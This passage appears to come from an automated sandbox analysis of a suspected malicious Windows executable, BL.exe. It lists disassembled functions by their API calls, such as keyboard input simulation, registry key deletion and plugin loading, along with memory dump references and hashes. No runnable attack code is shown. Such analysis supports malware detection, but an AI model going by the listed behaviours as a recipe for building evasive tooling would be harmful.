                                                                                                                            • GetLastError.KERNEL32 ref: 00436081
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1690418490-0
                                                                                                                            • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                            • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                            • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                            • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                            Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                            • String ID: .lnk$HH
                                                                                                                            • API String ID: 886957087-3121654589
                                                                                                                            • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                            • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                            • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                            • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                            Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                            • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                            • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                            • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                            • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                            Function 00437CA6 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: AU3_GetPluginDetails$#v
                                                                                                                            • API String ID: 145871493-3662034293
                                                                                                                            • Opcode ID: c408ffbdf54b3153002ace85412cc7a30708aaf56f74f2a47fe0f31dd6af338b
                                                                                                                            • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                            • Opcode Fuzzy Hash: c408ffbdf54b3153002ace85412cc7a30708aaf56f74f2a47fe0f31dd6af338b
                                                                                                                            • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                            Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 763830540-1403004172
                                                                                                                            • Opcode ID: 1431e30169807b15fc9b08fac251d8bb29e73564cb98c7e006ef338c651461fb
                                                                                                                            • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                            • Opcode Fuzzy Hash: 1431e30169807b15fc9b08fac251d8bb29e73564cb98c7e006ef338c651461fb
                                                                                                                            • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                            Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,76232EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                            • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                            • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                            • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                            • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                            Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,76232EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                            • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                            • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                            • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                            • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                            Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                            • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                            • String ID: SysAnimate32
                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                            • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                            • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                            • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                            • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                            Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                            • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1795658109-438819550
                                                                                                                            • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                            • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                            • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                            • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                            Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                              • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                              • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                              • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                              • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                            • GetFocus.USER32 ref: 004609EF
                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                            • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                            • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                            • String ID: %s%d
                                                                                                                            • API String ID: 991886796-1110647743
                                                                                                                            • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                            • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                            • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                            • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                            Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_sprintf
                                                                                                                            • String ID: %02X
                                                                                                                            • API String ID: 891462717-436463671
                                                                                                                            • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                            • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                            • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                            • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                            Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
                                                                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                            • String ID: $OH$@OH$X
                                                                                                                            • API String ID: 3491138722-1394974532
                                                                                                                            • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                            • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                            • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                            • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                            Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                            • SendInput.USER32 ref: 0044C509
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3031425849-0
                                                                                                                            • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                            • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                            • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                            • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                            Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$CloseDeleteOpen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2095303065-0
                                                                                                                            • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
